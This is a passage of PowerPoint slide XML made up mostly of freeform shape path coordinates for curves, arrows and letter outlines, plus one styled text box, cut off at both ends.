                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1715015" y="173825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1750953" y="199917"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1785638" y="227569"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1819021" y="256731"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1851048" y="287350"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1881670" y="319375"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1910834" y="352755"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1938488" y="387438"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1964583" y="423373"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1989065" y="460508"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2011885" y="498793"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2032990" y="538176"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2052329" y="578605"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2069850" y="620029"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2085503" y="662397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2099235" y="705657"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2110996" y="749757"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2120733" y="794647"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2128397" y="840276"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2133934" y="886590"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2137294" y="933541"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2138312" y="97631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1" name="Freeform 101"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7207504" y="6018847"/>
            <a:ext cx="649605" cy="839469"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="649604" h="839470">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="46209" y="15393"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91058" y="32985"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134505" y="52696"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="176507" y="74448"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="217023" y="98160"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="256010" y="123756"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="293425" y="151154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="329227" y="180276"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="363374" y="211043"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="395822" y="243377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="426530" y="277197"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="455456" y="312425"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="482558" y="348981"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="507792" y="386788"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="531118" y="425765"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="552492" y="465834"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="571873" y="506915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="589218" y="548930"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="604484" y="591799"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="617631" y="635443"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="628616" y="679784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="637395" y="724742"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="643928" y="770238"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="648172" y="816193"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="649119" y="839152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2" name="Freeform 102"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6024383" y="5979000"/>
            <a:ext cx="1183640" cy="879475"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1183640" h="879475">
                <a:moveTo>
                  <a:pt x="0" y="878998"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2503" y="838135"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7831" y="791134"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15658" y="744071"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26026" y="697022"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38977" y="650069"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54372" y="603854"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71966" y="559000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91680" y="515549"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="113434" y="473544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="137150" y="433026"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="162749" y="394038"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="190151" y="356622"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="219277" y="320820"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="250048" y="286674"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="282386" y="254226"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="316210" y="223519"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="351442" y="194595"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="388003" y="167496"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="425814" y="142264"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="464795" y="118941"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="504867" y="97570"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="545952" y="78192"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="587970" y="60850"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="630841" y="45586"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="674488" y="32442"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="718831" y="21460"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="763790" y="12683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="809287" y="6152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="855242" y="1910"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="901577" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="948211" y="462"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="995067" y="3339"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1042065" y="8674"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1089126" y="16509"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1136171" y="26886"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1183120" y="39846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3" name="Freeform 103"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7474711" y="6219659"/>
            <a:ext cx="318770" cy="330835"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="318770" h="330834">
                <a:moveTo>
                  <a:pt x="255397" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="221462"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="318643" y="330834"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="255397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4" name="TextBox 104"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3251834" y="2430462"/>
            <a:ext cx="864869" cy="2033905"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="50768" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700" algn="l">
              <a:lnSpc>
                <a:spcPct val="8406000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="6600" b="1" spc="9">
              <a:solidFill>
                <a:srgbClr val="3C7CB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5" name="Freeform 105"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2585720" y="1750060"/>
            <a:ext cx="383540" cy="304800"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="383539" h="304800">
                <a:moveTo>
                  <a:pt x="383286" y="155193"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="369871" y="90646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="329692" y="41528"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="268144" y="10382"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="190881" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="150780" y="2526"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82010" y="22770"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30003" y="62682"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3333" y="118308"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="151764"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3192" y="185864"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28771" y="242062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78920" y="281755"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="147639" y="301896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="188594" y="304418"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="231288" y="301968"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="269255" y="294624"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="330962" y="265302"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="370173" y="218249"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="383286" y="155193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6" name="Freeform 106"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2489326" y="4955921"/>
            <a:ext cx="576580" cy="452120"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="576580" h="452120">
                <a:moveTo>
                  <a:pt x="576326" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="576326" y="451611"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="475869" y="451611"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="475869" y="287273"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="287273"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="164083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="475869" y="164083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="475869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7" name="Freeform 107"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2489326" y="4257421"/>
            <a:ext cx="576580" cy="512445"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="576580" h="512445">
                <a:moveTo>
                  <a:pt x="576326" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="576326" y="133857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="213995" y="369061"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="197562" y="379634"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="184451" y="387921"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="174650" y="393922"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="168148" y="397636"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="168148" y="399541"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="220797" y="396095"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="576326" y="395858"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="576326" y="512317"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="512317"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="386587"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="372872" y="142493"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="410090" y="119866"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="419735" y="114934"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="419735" y="113029"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="402832" y="114530"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="381857" y="115601"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="356834" y="116244"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="327787" y="116458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="116458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8" name="Freeform 108"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2489326" y="3714496"/>
            <a:ext cx="576580" cy="341630"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="576580" h="341629">
                <a:moveTo>
                  <a:pt x="576326" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="576326" y="327786"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="475869" y="327786"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="475869" y="122681"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="340106" y="122681"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="340106" y="313181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="240030" y="313181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="240030" y="122681"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100456" y="122681"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100456" y="341121"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="341121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9" name="Freeform 109"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2489326" y="3079495"/>
            <a:ext cx="576580" cy="452120"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="576580" h="452120">
                <a:moveTo>
                  <a:pt x="576326" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="576326" y="451612"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="475869" y="451612"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="475869" y="287274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="287274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="164083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="475869" y="164083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="475869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0" name="Freeform 110"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2489326" y="2380995"/>
            <a:ext cx="576580" cy="512445"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="576580" h="512444">
                <a:moveTo>
                  <a:pt x="576326" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="576326" y="133857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="213995" y="369062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="197562" y="379634"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="184451" y="387921"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="174650" y="393922"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="168148" y="397637"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="168148" y="399541"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="220797" y="396095"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="576326" y="395858"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="576326" y="512317"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="512317"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="386588"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="372872" y="142493"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="410090" y="119866"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="419735" y="114934"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="419735" y="113029"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="402832" y="114530"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="381857" y="115601"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="356834" y="116244"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="327787" y="116458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="116458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1" name="Freeform 111"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2479294" y="5562219"/>
            <a:ext cx="596265" cy="390525"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="596264" h="390525">
                <a:moveTo>
                  <a:pt x="596011" y="223240"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="594651" y="263776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="590565" y="300915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="583741" y="334656"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="574167" y="364997"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="458724" y="364997"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="475986" y="334749"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="488330" y="302031"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="495746" y="266846"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="498220" y="229196"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="497177" y="207639"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="481711" y="156641"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="450421" y="131174"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="437133" y="129476"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="426206" y="130640"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="385871" y="160805"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="360483" y="206758"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="345313" y="239991"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="326596" y="279601"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="287734" y="338664"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="246133" y="372199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="197365" y="388296"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="170053" y="390309"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="131000" y="386634"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="67754" y="357240"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24485" y="299033"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10874" y="260359"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2716" y="215499"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="164452"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2000" y="117202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8000" y="74420"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18002" y="36113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32004" y="2285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="155194" y="2285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="129950" y="38229"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="111934" y="76561"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="101133" y="117275"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="97536" y="160362"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98609" y="183920"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107233" y="221683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134556" y="254869"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="159257" y="261200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="170809" y="259943"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="214893" y="226945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="243139" y="173924"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="260095" y="135064"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="285105" y="86441"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="314267" y="48623"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="347585" y="21610"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="385068" y="5402"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="426719" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="464675" y="3831"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="527107" y="34445"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="571043" y="94281"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="584930" y="132314"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="593244" y="175301"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="596011" y="22324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2" name="Freeform 112"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2479294" y="1620900"/>
            <a:ext cx="596265" cy="562610"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="596264" h="562610">
                <a:moveTo>
                  <a:pt x="596011" y="288036"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="590887" y="346757"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="575500" y="399478"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="549826" y="446198"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="513842" y="486918"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="479062" y="514013"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="440551" y="535098"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="398298" y="550167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="352289" y="559212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="302513" y="562228"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="250668" y="559102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="202883" y="549715"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="159163" y="534056"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="119516" y="512111"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="83947" y="483870"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53709" y="450615"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30202" y="413483"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13419" y="372468"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3353" y="327564"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="278764"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3247" y="231032"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12992" y="187042"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29242" y="146789"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="52002" y="110267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81280" y="77470"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="115677" y="49613"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="153800" y="27925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="195653" y="12419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="241243" y="3106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="290575" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="342741" y="3168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="390877" y="12671"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="434978" y="28501"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="475036" y="50653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="511048" y="79121"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="541634" y="112771"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="565424" y="150482"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="582416" y="192259"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="592612" y="238108"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="596011" y="288036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3" name="Freeform 113"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2479294" y="1011300"/>
            <a:ext cx="596265" cy="447675"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="596264" h="447675">
                <a:moveTo>
                  <a:pt x="596011" y="305943"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="594651" y="346424"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="590565" y="383476"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="583741" y="417099"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="574167" y="447294"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="455422" y="447294"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="470423" y="417095"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="481139" y="384968"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="487568" y="350889"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="489712" y="314833"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="486332" y="274734"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="459333" y="207158"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="406689" y="157608"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="336117" y="132324"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="294639" y="129159"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="254323" y="132159"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="186072" y="156162"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="135518" y="203285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="109662" y="268194"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="106425" y="306959"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108757" y="344656"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="115744" y="380603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="127375" y="414811"/>
